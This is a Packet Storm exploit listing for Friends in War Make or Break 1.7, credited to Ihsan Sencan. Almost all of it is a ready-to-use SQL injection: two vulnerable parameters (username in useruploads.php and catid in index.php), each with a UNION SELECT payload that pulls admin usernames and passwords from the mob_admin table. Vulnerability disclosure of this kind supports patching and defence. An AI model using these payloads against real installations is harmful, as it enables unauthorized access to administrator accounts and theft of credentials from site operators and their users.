Friends In War Make Or Break 1.7 SQL Injection

2017-07-27T00:00:00
ID PACKETSTORM:143529
Type packetstorm
Reporter Ihsan Sencan
Modified 2017-07-27T00:00:00

Description

                                        
                                            `# # # # #  
# Exploit Title: Friends in War Make or Break 1.7 SQL Injection  
# Dork: N/A  
# Date: 26.07.2017  
# Vendor : http://software.friendsinwar.com/  
# Software: http://software.friendsinwar.com/downloads.php?cat_id=2&file_id=9  
# Demo: http://localhost/[PATH]/  
# Version: 1.7  
# # # # #  
# Author: Ihsan Sencan  
# # # # #  
# SQL Injection/Exploit :  
# http://localhost/[PATH]/useruploads.php?username=[SQL]  
# -sie'+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-  
# http://localhost/[PATH]/index.php?catid=SQL]  
# 1+union+select+1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11+from+mob_admin--+-  
# Etc..  
# # # # #  
  
`